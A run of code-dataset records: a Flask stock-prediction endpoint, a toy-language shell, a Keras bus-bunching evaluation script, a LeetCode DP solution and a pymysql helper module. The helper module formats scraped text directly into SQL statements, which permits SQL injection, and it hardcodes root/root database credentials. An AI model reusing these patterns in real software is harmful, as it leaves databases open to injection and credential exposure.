main()","sub_path":"python_study/day1-2.py","file_name":"day1-2.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"481996739","text":"from flask import Flask, render_template, jsonify\nimport pandas as pd\n\n#Use flask_pymongo to set up mongo connection\n# app.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/stocks_app\"\n\n# mongo = PyMongo(app)\n# client = MongoClient(app.config['MONGO_URI'])\n# db = client.stocks\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n #stocks = mongo.db.stocks.insert_many()\n return render_template(\"index.html\")\n\n@app.route('/predict')\ndef data():\n actual_df = pd.read_csv(f'actual_INX.csv')\n predicted_df = pd.read_csv(f'predicted_INX.csv')\n start_date = '1/1/2018'\n\n # date_strings = (pd\n # .date_range(start=start_date, periods=len(predicted_df))\n # .strftime(\"%Y-%m-%d\")\n # .values\n # .tolist())\n\n actual_and_predicted = {\n\n # x\n # 'date': date_strings,\n # y1\n 'actual': actual_df['0'].tolist(),#to_json(orient='records'),\n # y2\n 'predicted': predicted_df['0'].tolist()#to_json(orient='records')\n } \n return jsonify(actual_and_predicted)\n\n\nif __name__ == '__main__':\n app.debug = True \n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"366079221","text":"from my_parser import Parser\r\nfrom my_tokens import *\r\nfrom my_executor import Exec\r\n\r\nmode = False\r\n\r\ne = Exec(mode=mode) # True will set to print tokens for debugging, default is Flase\r\np = Parser()\r\n\r\nwhile True:\r\n curr = input(\"Adam-Lang$ \")\r\n e.exec(p.parse(' ' + curr + ' '))\r\n '''if True: # to debug the executor tree\r\n while True:\r\n curr = input(\">>>\")\r\n exec(curr)'''\r\n if mode: [print(x) for x in p.parse(' ' + curr + ' ')] # to debug the parser","sub_path":"shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"496959776","text":"#####################################################\r\n#\tAlgoritmo de prediccion de bunching\t\t\t\t#\r\n#\tpara el conjunto completo de ventanas de tiempo\t#\r\n#\tusando RNH\t\t\t\t\t\t\t\t\t\t#\r\n#####################################################\r\n\r\nimport os\r\nimport gc\r\nimport numpy\r\nimport h5py\r\nimport math\r\nfrom pandas import read_csv\r\nfrom keras.callbacks import CSVLogger\r\nfrom keras.models 
import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import Adam\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\nfeatures = 4\r\nsecuencia = 4\r\n\r\nfechasVentana = ['20161107','20161108','20161109','20161110','20161111','20161114','20161115','20161116','20161117','20161118','20161121','20161122','20161123','20161124','20161125','20161128','20161129','20161130','20161201','20161202','20161205','20161206','20161207','20161208','20161209']\r\ninicioPruebas = 7\r\nfinPruebas = 21\r\n\r\ndef cls():\r\n\tos.system('cls' if os.name=='nt' else 'clear')\r\n\r\ndef normalizarX(dataset):\r\n#\tdataset[:, 0] = [k / (4800) for k in dataset[:, 0]]\r\n#\tdataset[:, 1] = [k / 8 for k in dataset[:, 1]]\r\n\t#dataset[:, 2] = [k / (4800) for k in dataset[:, 2]]\r\n\tdataset[:, 3] = [k / (3600) for k in dataset[:, 3]]\r\n\treturn dataset\r\n\r\ndef denormalizarX(dataset):\r\n#\tdataset[:, 0] = [k * (4800) for k in dataset[:, 0]]\r\n#\tdataset[:, 1] = [k * (8) for k in dataset[:, 1]]\r\n\t#dataset[:, 2] = [k * (4800) for k in dataset[:, 2]]\r\n\tdataset[:, 3] = [k * (3600) for k in dataset[:, 3]]\r\n\treturn dataset\r\n\r\ndef normalizarY(dataset):\r\n\tdataset = [k/(600) for k in dataset]\r\n\treturn dataset\r\n\r\ndef denormalizarY(dataset):\r\n\tdataset = [k*(600) for k in dataset]\r\n\treturn dataset\r\n\r\n# Allows printing in colors\r\nclass bcolors:\r\n    HEADER = '\\033[95m'\r\n    OKBLUE = '\\033[94m'\r\n    OKGREEN = '\\033[92m'\r\n    WARNING = '\\033[93m'\r\n    FAIL = '\\033[91m'\r\n    ENDC = '\\033[0m'\r\n    BOLD = '\\033[1m'\r\n    UNDERLINE = '\\033[4m'\r\n\r\n# Trip object\r\nclass Viaje():\r\n\tdef __init__(self,id_viaje,limiteVentana):\r\n\t\tself.id = id_viaje;\r\n\t\tself.limiteVentana = limiteVentana;\r\n\t\tself.predicciones = numpy.array([]);\r\n\t\tself.x=numpy.array([]);\r\n\t\tself.y=numpy.array([]);\r\n\r\n# Load the headway dataset\r\ndataframe = read_csv('../../datos/datasetBrutos/datasetBrutoI09Modelo2.tsv', engine = 'python', sep = \"\\t\")\r\ndatasetBruto = dataframe.values\r\ndatasetBruto = datasetBruto.astype(float)\r\n\r\n# Load the headway dataset\r\ndataframe = read_csv('../../datos/datasetDefinitivoModelo2v4.tsv', engine = 'python', sep = \"\\t\")\r\ndatasetDefinitivo = dataframe.values\r\ndatasetDefinitivo = datasetDefinitivo.astype(float)\r\ndel(dataframe)\r\ngc.collect()\r\n\r\nprecisionesDetalle = numpy.zeros(len(range(inicioPruebas*3600, finPruebas*3600, 1800))*len(fechasVentana))\r\nprecisionesBinarias = numpy.zeros(len(range(inicioPruebas*3600, finPruebas*3600, 1800))*len(fechasVentana))\r\nsensibilidades = numpy.zeros(len(range(inicioPruebas*3600, finPruebas*3600, 1800))*len(fechasVentana))\r\nespecificidades = numpy.zeros(len(range(inicioPruebas*3600, finPruebas*3600, 1800))*len(fechasVentana))\r\n\r\nf = open(\"../../resultados/pruebas/prediccionBunchingHeadway.tsv\",\"w\")\r\nf.write(\"Date\\tEnd time\\tNumber of trip pairs\\tBinary precision\\tCase-by-case precision\\n\")\r\n\r\nf2 = open(\"../../resultados/ROC/datosROCheadway2.tsv\",\"w\")\r\n\r\nfor dia in fechasVentana:\r\n\tfor finVentana in range(inicioPruebas*3600, finPruebas*3600, 1800):\r\n\r\n\t\tprint(\"Window:\\n- Day: {}\\n- finVentana: {}\\n\".format(dia,finVentana))\r\n\r\n\t\t# Store the ids of trips that fall inside the window\r\n\t\tlista_ids = []\r\n\t\tid_viaje = 0\r\n\t\tprint('Trip ID \tSTART \t\tEND \tLastStop')\r\n\t\tfor i in range(len(datasetBruto)):\r\n\t\t\tif datasetBruto[i][2] == 1:\r\n\t\t\t\tif id_viaje != 0:\r\n\t\t\t\t\tfinViaje = 
datasetBruto[i-1][3]\r\n\t\t\t\t\tif finViaje > finVentana and inicioViaje < finVentana and '{0:12.0f}'.format(id_viaje).find(dia) > -1:\r\n\t\t\t\t\t\t# Check the stop at which the window ends\r\n\t\t\t\t\t\tj = 2\r\n\t\t\t\t\t\twhile datasetBruto[i-j][3] > finVentana:\r\n\t\t\t\t\t\t\tj = j + 1\r\n\r\n\t\t\t\t\t\tultimoParaderoVentana = datasetBruto[i-j][2]\r\n\r\n\t\t\t\t\t\tprint('{0:11.0f}\t{1:11.0f}\t{2:11.0f}\t{3:2.0f}'.format(id_viaje, inicioViaje, finViaje,ultimoParaderoVentana))\r\n\t\t\t\t\t\tlista_ids.append(['{0:11.0f}'.format(id_viaje),ultimoParaderoVentana])\r\n\r\n\t\t\t\tid_viaje = datasetBruto[i][0]\r\n\t\t\t\tinicioViaje = datasetBruto[i][3]\r\n\r\n\t\tif len(lista_ids)>1:\r\n\r\n\t\t\t# Take the trips for each distinct id (column 0) and put them into another array \r\n\t\t\tdataset_viajes = []\r\n\t\t\tfor i in range(len(datasetDefinitivo)):\r\n\t\t\t\tid_lectura = datasetDefinitivo[i][0]\r\n\t\t\t\t#In case dataset_viaje already has data\r\n\t\t\t\tidviaje1 = '{}{}'.format('{0:8.0f}'.format(id_lectura)[:9],'{0:16.0f}'.format(id_lectura)[11:13])\r\n\t\t\t\tidviaje2 = '{}{}'.format('{0:8.0f}'.format(id_lectura)[:9],'{0:16.0f}'.format(id_lectura)[14:16])\r\n\t\t\t\t\r\n\t\t\t\tcheck1 = False\r\n\t\t\t\tcheck2 = False\r\n\t\t\t\tidLimiteVentana1 = -1\r\n\t\t\t\tidLimiteVentana2 = -1\r\n\r\n\t\t\t\tfor j in range(len(lista_ids)):\r\n\t\t\t\t\t#print(\"\\'{}\\' \\'{}\\' \\'{}\\'\".format(lista_ids[j][:11],idviaje1[:11],idviaje2[:11]))\r\n\t\t\t\t\tif idviaje1[:11] == lista_ids[j][0][:11]:\r\n\t\t\t\t\t\tidLimiteVentana1 = lista_ids[j][1]-1\r\n\t\t\t\t\t\tcheck1 = True\r\n\t\t\t\t\tif idviaje2[:11] == lista_ids[j][0][:11]:\r\n\t\t\t\t\t\tidLimiteVentana2 = lista_ids[j][1]-1\r\n\t\t\t\t\t\tcheck2 = True\r\n\t\t\t\t\r\n\t\t\t\t# If both trips are inside the window\r\n\t\t\t\tif check1 and check2:\r\n\r\n\t\t\t\t\tindiceVentana = min([idLimiteVentana2,idLimiteVentana1])\r\n\t\t\t\t\t#print('{} {}'.format(idviaje1,idviaje2))\r\n\t\t\t\t\tif len(dataset_viajes) > 0:\r\n\t\t\t\t\t\t#Add points to the same trip\r\n\t\t\t\t\t\tif dataset_viajes[len(dataset_viajes)-1].id == id_lectura:\r\n\t\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].x = numpy.append(dataset_viajes[len(dataset_viajes)-1].x,[datasetDefinitivo[i][1:5]],axis=0)\r\n\t\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].y = numpy.append(dataset_viajes[len(dataset_viajes)-1].y,[datasetDefinitivo[i][5]],axis=0)\r\n\t\t\t\t\t\t#Add a new trip\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tdataset_viajes.append(Viaje(id_lectura,indiceVentana))\r\n\t\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].x = numpy.array([datasetDefinitivo[i][1:5]])\r\n\t\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].y = numpy.array([datasetDefinitivo[i][5]])\r\n\t\t\t\t\t#In case it is the first trip\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tdataset_viajes.append(Viaje(id_lectura,indiceVentana))\r\n\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].x = numpy.array([datasetDefinitivo[i][1:5]])\r\n\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].y = numpy.array([datasetDefinitivo[i][5]])\r\n\r\n\t\t\tdataset = dataset_viajes\r\n\t\t\tdel(dataset_viajes)\r\n\t\t\tgc.collect()\r\n\r\n\t\t\tfor i in range(len(dataset)):\r\n\t\t\t\tdataset[i].x = normalizarX(dataset[i].x)\r\n\t\t\t\tdataset[i].x = numpy.reshape(dataset[i].x, (1,len(dataset[i].x), len(dataset[i].x[0])))\r\n\t\t\t#\tdataset[i].y = normalizarY(dataset[i].y)\r\n\t\t\t\tdataset[i].y = numpy.reshape(dataset[i].y, (len(dataset[i].y),1))\r\n\r\n\t\t\t#print('\\nNumber of trip pairs: 
{}'.format(len(dataset)))\r\n\r\n\t\t\t# Import the predictor network model\r\n\t\t\tmodelo = load_model('../../resultados/modelos/Headway/modeloHeadway10/modeloHeadway002e51.h5')\r\n\r\n\t\t\t# Sequences must be prepared until the prediction is no longer inside the window\r\n\t\t\t# New sequences are built from the previous predictions\r\n\r\n\t\t\tprecisionBinaria = 0.0\r\n\t\t\tprecisionDetalle = float(0.0)\r\n\t\t\tsensibilidad = 0.0\r\n\t\t\tespecificidad = 0.0\r\n\r\n\t\t\tcantidadParesViajes = 0.0\r\n\r\n\t\t\t#print('Pair ID\\tstop\\tpredicted output\\tactual output\\tpredicted headway\\tactual headway\\tpredicted bunching\\tactual bunching')\r\n\t\t\tfor i in range(len(dataset)):\r\n\t\t\t\t# Capture the initial headway to determine bunching\r\n\t\t\t\theadwayInicial = dataset[i].x[0][0][3]*3600\t\t\t\t\r\n\t\t\t\t#print(headwayInicial)\r\n\r\n\t\t\t\ttempPrecisionPrediccion = 0\r\n\t\t\t\ttempPrecisionReal = 0\r\n\t\t\t\ttempPrecisionDetalle = 0 \r\n\t\t\t\ttempSensibilidad = 0.0\r\n\t\t\t\ttempEspecificidad = 0.0\r\n\t\t\t\tcantBunching = 0.0\r\n\t\t\t\tcantNoBunching = 0.0\r\n\r\n\t\t\t\tif dataset[i].limiteVentana < len(dataset[i].x[0])-1 and dataset[i].limiteVentana > secuencia:\r\n\t\t\t\t\tcantidadParesViajes = cantidadParesViajes + 1.0\r\n\t\t\t\t\tultimaSecuencia = numpy.array([])\r\n\t\t\t\t\tfor j in range(len(dataset[i].x[0])-secuencia):\r\n\t\t\t\t\t\t# In case it is still inside the window\r\n\t\t\t\t\t\tif (j+secuencia) <= dataset[i].limiteVentana:\r\n\t\t\t\t\t\t\t# Feed the network to make predictions\r\n\t\t\t\t\t\t\tentrada_metadatos = numpy.array( [ dataset[i].x[0][j+secuencia][0:3] ] )\r\n\t\t\t\t\t\t\tentrada_recurrente = numpy.array( dataset[i].x[:,j:j+secuencia,3:4] )\r\n\t\t\t\t\t\t\tsalida_secuencia = numpy.array( [ dataset[i].y[j+secuencia] ] )\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tprediccionesTemp = modelo.predict([entrada_metadatos,entrada_recurrente], batch_size = 1, verbose = 0)\r\n\r\n\t\t\t\t\t\t\tprediccion = prediccionesTemp[0][0]*600\r\n\t\t\t\t\t\t\theadwayPrediccion = prediccionesTemp[0][0]*600+dataset[i].x[0][j+secuencia][3]*3600\r\n\t\t\t\t\t\t\theadwayReal = salida_secuencia[0][0]+dataset[i].x[0][j+secuencia][3]*3600\r\n\r\n\t\t\t\t\t\t\t#Check whether there is bunching or not\r\n\t\t\t\t\t\t\tbunchingPrediccion = False\r\n\t\t\t\t\t\t\tbunchingReal = False\r\n\t\t\t\t\t\t\tif abs(headwayPrediccion) < 0.25*headwayInicial:\r\n\t\t\t\t\t\t\t\tbunchingPrediccion = True\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif abs(headwayReal) < 0.25*headwayInicial:\r\n\t\t\t\t\t\t\t\tbunchingReal = True\r\n\r\n\t\t\t\t\t\t\t#print(bcolors.OKGREEN+'{0:13.0f}\\t{1}\\t{2:4.0f}\\t{3:4.0f}\\t{4}\\t{5}'.format(dataset[i].id,j+1+secuencia,headwayReal,headwayReal,bunchingReal,bunchingReal)+bcolors.ENDC)\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif j == 0:\r\n\t\t\t\t\t\t\t\tdataset[i].predicciones = numpy.array([headwayReal])\r\n\t\t\t\t\t\t\t\t# dataset[i].predicciones = prediccionesTemp[0]*600+dataset[i].x[0][j+secuencia][3]*3600\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tdataset[i].predicciones = numpy.append(dataset[i].predicciones,[headwayReal],axis=0)\r\n\t\t\t\t\t\t\t\t# dataset[i].predicciones = numpy.append(dataset[i].predicciones,prediccionesTemp[0]*600+dataset[i].x[0][j+secuencia][3]*3600,axis=0)\r\n\r\n\t\t\t\t\t\t\tif (j+secuencia) == dataset[i].limiteVentana:\r\n\t\t\t\t\t\t\t\t# Must generate the next sequence\r\n\t\t\t\t\t\t\t\tultimaSecuencia = numpy.array( dataset[i].x[:,j+1:j+secuencia+1,3:4] )\r\n\t\t\t\t\t\t\t\t# 
ultimaSecuencia = numpy.append(ultimaSecuencia,[prediccionesTemp],axis=1)\r\n\t\t\t\t\t\t\t\t#print(ultimaSecuencia)\r\n\r\n\t\t\t\t\t\t# In case previous predictions must be used to generate the remaining ones\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tentrada_metadatos = numpy.array( [[ j+1+secuencia, dataset[i].x[0][0][1],dataset[i].x[0][0][2] ]] )\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t#print(entrada_metadatos)\r\n\r\n\t\t\t\t\t\t\tentrada_recurrente = ultimaSecuencia\r\n\r\n\t\t\t\t\t\t\tsalida_secuencia = numpy.array( [ dataset[i].y[j+secuencia] ] )\r\n\r\n\t\t\t\t\t\t\tsiguientePrediccion = modelo.predict([entrada_metadatos,entrada_recurrente], batch_size = 1, verbose = 0)\r\n\r\n\t\t\t\t\t\t\tprediccion = siguientePrediccion[0][0]*600\r\n\t\t\t\t\t\t\theadwayPrediccion = siguientePrediccion[0][0]*600+dataset[i].predicciones[len(dataset[i].predicciones)-1]\r\n\t\t\t\t\t\t\theadwayReal = salida_secuencia[0][0]+dataset[i].x[0][j+secuencia][3]*3600\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t#Check whether there is bunching or not\r\n\t\t\t\t\t\t\tif abs(headwayPrediccion) < 0.25*headwayInicial:\r\n\t\t\t\t\t\t\t\tbunchingPrediccion = True\r\n\t\t\t\t\t\t\t\ttempPrecisionPrediccion = 1\r\n\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif abs(headwayReal) < 0.25*headwayInicial:\r\n\t\t\t\t\t\t\t\tbunchingReal = True\r\n\t\t\t\t\t\t\t\ttempPrecisionReal = 1\r\n\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif bunchingReal == bunchingPrediccion:\r\n\t\t\t\t\t\t\t\ttempPrecisionDetalle = tempPrecisionDetalle + 1\r\n\r\n\t\t\t\t\t\t\tif bunchingReal== True and bunchingReal == bunchingPrediccion:\r\n\t\t\t\t\t\t\t\ttempSensibilidad = tempSensibilidad + 1\r\n\t\t\t\t\t\t\t\tcantBunching = cantBunching + 1\r\n\r\n\r\n\t\t\t\t\t\t\tif bunchingReal== False and bunchingReal == bunchingPrediccion:\r\n\t\t\t\t\t\t\t\ttempEspecificidad = tempEspecificidad + 1\r\n\t\t\t\t\t\t\t\tcantNoBunching = cantNoBunching + 1\r\n\r\n\t\t\t\t\t\t\tf2.write('{0:4.8f}\\t{1:4.8f}\\t{2}\\t{3}\\n'.format(round(abs(headwayPrediccion))/headwayInicial,abs(headwayReal)/headwayInicial,bunchingPrediccion*1,bunchingReal*1))\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tdataset[i].predicciones = numpy.append(dataset[i].predicciones,[headwayPrediccion],axis=0)\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif j < (len(dataset[i].x[0]) - 1):\r\n\t\t\t\t\t\t\t\tultimaSecuencia = numpy.array([ultimaSecuencia[0][1:secuencia]])\r\n\t\t\t\t\t\t\t\tultimaSecuencia = numpy.append(ultimaSecuencia,[siguientePrediccion],axis=1)\r\n\t\t\t\t\t\t\t\t#print(ultimaSecuencia)\r\n\t\t\t\t\t\r\n\t\t\t\t\t# After traversing the whole trip, compute the precisions\r\n\t\t\t\t\tprecisionDetalle = precisionDetalle + float(tempPrecisionDetalle)/float((len(dataset[i].x[0]))-dataset[i].limiteVentana-1)\r\n\t\t\t\t\tif cantBunching > 0:\r\n\t\t\t\t\t\tsensibilidad = sensibilidad + float(tempSensibilidad)/float(cantBunching)\r\n\t\t\t\t\tif cantNoBunching > 0:\r\n\t\t\t\t\t\tespecificidad = especificidad + float(tempEspecificidad)/float(cantNoBunching)\r\n\r\n\t\t\t\t\taciertoBinario = 0\r\n\t\t\t\t\tif tempPrecisionReal == tempPrecisionPrediccion:\r\n\t\t\t\t\t\tprecisionBinaria = precisionBinaria + 1\r\n\t\t\t\t\t\taciertoBinario = 1 \r\n\r\n\t\t\t\t\t# print(\"\\nPair {}\\nBunching-existence hit: {}\\nAccumulated binary hits: {}\\nStops predicted correctly: {}\\nStop precision: {}\\nAccumulated precision: {}\\n\".format(dataset[i].id,aciertoBinario,precisionBinaria,tempPrecisionDetalle,float(tempPrecisionDetalle)/float((len(dataset[i].x[0]))-dataset[i].limiteVentana-1),precisionDetalle))\r\n\r\n\t\t\tif 
cantidadParesViajes > 0:\r\n\t\t\t\tsensibilidad = float(sensibilidad)/float(cantidadParesViajes)\r\n\t\t\t\tespecificidad = float(especificidad)/float(cantidadParesViajes)\r\n\t\t\t\tprecisionDetalle = float(precisionDetalle)/float(cantidadParesViajes)\r\n\t\t\t\tprecisionBinaria = precisionBinaria/cantidadParesViajes\r\n\r\n\t\t\t\tprint(bcolors.OKBLUE+\"\\nBinary precision: {0:3.4f}\\tDetail precision: {1:3.4f}\\tSensitivity: {2:3.4f}\\tSpecificity: {3:3.4f}\\n\".format(precisionBinaria*100, precisionDetalle*100,sensibilidad*100,especificidad*100)+bcolors.ENDC)\r\n\t\t\t\tf.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(dia,finVentana,cantidadParesViajes,precisionBinaria,precisionDetalle,sensibilidad,especificidad))\r\n\r\n\t\t\t\tfor p in range(len(precisionesBinarias)):\r\n\t\t\t\t\tif precisionesBinarias[p] == 0.0:\r\n\t\t\t\t\t\tprecisionesBinarias[p] = precisionBinaria\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\t\tfor p in range(len(precisionesDetalle)):\r\n\t\t\t\t\tif precisionesDetalle[p] == 0.0:\r\n\t\t\t\t\t\tprecisionesDetalle[p] = precisionDetalle\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\t\tfor p in range(len(sensibilidades)):\r\n\t\t\t\t\tif sensibilidades[p] == 0.0:\r\n\t\t\t\t\t\tsensibilidades[p] = sensibilidad\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\t\tfor p in range(len(especificidades)):\r\n\t\t\t\t\tif especificidades[p] == 0.0:\r\n\t\t\t\t\t\tespecificidades[p] = especificidad\r\n\t\t\t\t\t\tbreak\r\n\r\n\r\npromedioPrecisionBinaria = 0.0\r\ncontador = 0.0\r\nfor i in range(len(precisionesBinarias)):\r\n\tif precisionesBinarias[i] != 0:\r\n\t\tcontador = contador + 1\r\n\t\tpromedioPrecisionBinaria = promedioPrecisionBinaria + precisionesBinarias[i]\r\n\r\npromedioPrecisionBinaria = promedioPrecisionBinaria / contador\r\n\r\npromedioPrecisionDetalle = 0.0\r\ncontador = 0.0\r\nfor i in range(len(precisionesDetalle)):\r\n\tif precisionesDetalle[i] != 0:\r\n\t\tcontador = contador + 1\r\n\t\tpromedioPrecisionDetalle = promedioPrecisionDetalle + precisionesDetalle[i]\r\n\r\npromedioPrecisionDetalle = promedioPrecisionDetalle / contador\r\n\r\n\r\npromedioSensibilidad = 0.0\r\ncontador = 0.0\r\nfor i in range(len(sensibilidades)):\r\n\tif sensibilidades[i] != 0:\r\n\t\tcontador = contador + 1\r\n\t\tpromedioSensibilidad = promedioSensibilidad + sensibilidades[i]\r\n\r\npromedioSensibilidad = promedioSensibilidad / contador\r\n\r\n\r\npromedioEspecificidad = 0.0\r\ncontador = 0.0\r\nfor i in range(len(especificidades)):\r\n\tif especificidades[i] != 0:\r\n\t\tcontador = contador + 1\r\n\t\tpromedioEspecificidad = promedioEspecificidad + especificidades[i]\r\n\r\npromedioEspecificidad = promedioEspecificidad / contador\r\n\r\nprint(bcolors.FAIL+\"\\nBinary precision: {}\\tDetail precision: {}\\tSensitivity: {}\\tSpecificity: {}\\n\".format(promedioPrecisionBinaria,promedioPrecisionDetalle,promedioSensibilidad,promedioEspecificidad)+bcolors.ENDC)\r\nf.write(\"Average\\t\\t\\t{}\\t{}\\t{}\\t{}\\n\".format(promedioPrecisionBinaria,promedioPrecisionDetalle,promedioSensibilidad,promedioEspecificidad))\r\nf.close()\r\nf2.close()","sub_path":"codigo/prediccionBunching/prediccionRNH-Completo.py","file_name":"prediccionRNH-Completo.py","file_ext":"py","file_size_in_byte":15687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"612932864","text":"class Solution(object):\n    def numDistinct(self, s, t):\n        \"\"\"\n        :type s: str\n        :type t: str\n        :rtype: int\n        \"\"\"\n        n1 = len(s)\n        n2 = len(t)\n        # dp[i][j] is the number of ways the first j characters of t can be formed from the first i characters of s.\n        dp = [[0] * (n2 + 1) for _ in range(n1 + 
1)]\n        # When t is empty, the result is clearly 1 for any string s\n        for i in range(n1 + 1):\n            dp[i][0] = 1\n        # These do not need to be re-assigned (they are already 0)\n        # for j in range(n2 + 1):\n        #     dp[0][j] = 0\n        for i in range(1, n1 + 1):\n            for j in range(1, n2 + 1):\n                # When the current characters of s and t are equal,\n                # the last character of s can either match the last character of t or be skipped -- two possibilities\n                # dp[i-1][j-1]: s's last character matches t's last character\n                # dp[i-1][j]: s's last character is not used\n                if s[i - 1] == t[j - 1]:\n                    dp[i][j] = dp[i - 1][j - 1] + dp[i - 1][j]\n                # If the current characters of s and t differ, s's last character clearly cannot be used\n                else:\n                    dp[i][j] = dp[i - 1][j]\n        return dp[-1][-1]\n","sub_path":"题目分类/动态规划/distinct_subsequences_115.py","file_name":"distinct_subsequences_115.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"308321368","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nimport pymysql\nimport getDBInfo\nimport time\nimport kaoyanSpider\n\n\nclass MySQLWrapper(object):\n    \"\"\"\n    Wrapper for database operations.\n    \"\"\"\n    def __init__(self, command='', *args, **kwargs):\n        if command != '':\n            conn = self.get_conn()\n            try:\n                cursor = conn.cursor()\n                cursor.execute(command)\n            except Exception:\n                print('SQL execute error')\n            conn.conn_close(conn)\n\n    def get_conn(self):\n        conn = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n        return conn\n\n    def conn_close(self, conn=None):\n        conn.close()\n\n    # def execute(self, command, method_flag=0, conn=None):\n    #     cursor = conn.cursor()\n    #     # noinspection PyBroadException\n    #     try:\n    #         if not method_flag:\n    #             cursor.execute(command)\n    #         else:\n    #             cursor.execute(command[0], command[1])\n    #         conn.commit()\n    #     except Exception:\n    #         print('sql execute error!')\n    #         return 0\n\n\ndef get_school_key(name):\n    command = \"select id from school where name = '{}'\".format(name)\n    db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n    cursor = db.cursor()\n    try:\n        cursor.execute(command)\n        sid = cursor.fetchone()[0]\n    except:\n        db.rollback()\n    db.close()\n    return sid\n\n\ndef do_school_insert(name, link):\n    command = gen_school_insert_command(getDBInfo.get_school_info_dict(name, link))\n    db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n    cursor = db.cursor()\n    print(name, \"->\")\n    try:\n        cursor.execute(command)\n        db.commit()\n    except Exception:\n        db.rollback()\n    db.close()\n    print(name, \"inserted successfully\")\n\n\ndef insert_site_to_school(logo_dict):\n    logo_list = [logo_dict['school_name'], logo_dict['logo_link']]\n    db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n    cursor = db.cursor()\n    command = u\"UPDATE SCHOOL SET imgsrc = '{0[1]}' WHERE name = '{0[0]}'\".format(logo_list)\n    print(command)\n    try:\n        cursor.execute(command)\n        db.commit()\n    except Exception:\n        db.rollback()\n    db.close()\n    print(logo_list)\n\n\ndef do_comm_insert():\n    a = 1\n    for k, v in kaoyanSpider.get_comm().items():\n        db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n        cursor = db.cursor()\n        comm_dict = {'title': k, 'content': v}\n        command = gen_comm_insert_command(comm_dict)\n        print('Record {} ->'.format(a))\n        try:\n            cursor.execute(command)\n            db.commit()\n        except Exception:\n            db.rollback()\n        db.close()\n        print('-------------------accomplish-------------------------')\n        a += 1\n\n\ndef do_content_insert(command):\n    db = pymysql.connect(\"localhost\", \"root\", \"root\", \"kaoyanbao\")\n    cursor = db.cursor()\n    try:\n        cursor.execute(command)\n        db.commit()\n    except Exception:\n        db.rollback()\n    db.close()\n\n\ndef gen_comm_insert_command(info_dict):\n    info_list = ['title', 'content']\n    t = []\n    for il in info_list:\n        if il in info_dict:\n            
t.append(info_dict[il])\n        else:\n            t.append('')\n    create_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n    t.append(create_time)\n    command = (u\"INSERT INTO COMM(title, content, create_time, levels, u_id) VALUES \"\n               u\"('{0[0]}', '{0[1]}', '{0[2]}', 2, 1)\".format(t))\n    return command\n\n\ndef gen_school_insert_command(info_dict):\n    \"\"\"Generate insert sql for school.\n\n    :param info_dict: dict containing the school's information\n    :return: command\n    :rtype: str\n    \"\"\"\n    info_list = ['name', 'intro', 'district', 'site']\n    t = []\n    for il in info_list:\n        if il in info_dict:\n            t.append(info_dict[il])\n        else:\n            t.append('')\n    command = (u\"INSERT INTO SCHOOL(name, intro, district, site) VALUES \"\n               u\"('{0[0]}', '{0[1]}', '{0[2]}', '{0[3]}')\".format(t))\n    return command\n\n\ndef gen_content_insert_command(info_dict):\n    info_list = ['title', 'content']\n    t = [info_dict['sheet_name']]\n    for il in info_list:\n        if il in info_dict:\n            t.append(info_dict[il])\n        else:\n            t.append('')\n    t.append(get_school_key(info_dict['school_name']))\n    command = (u\"INSERT INTO {0[0]}(title, content, sId) VALUES \"\n               u\"('{0[1]}', '{0[2]}', {0[3]})\".format(t))\n    return command\n\n\n\n\n\n","sub_path":"mysqlWrapper.py","file_name":"mysqlWrapper.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
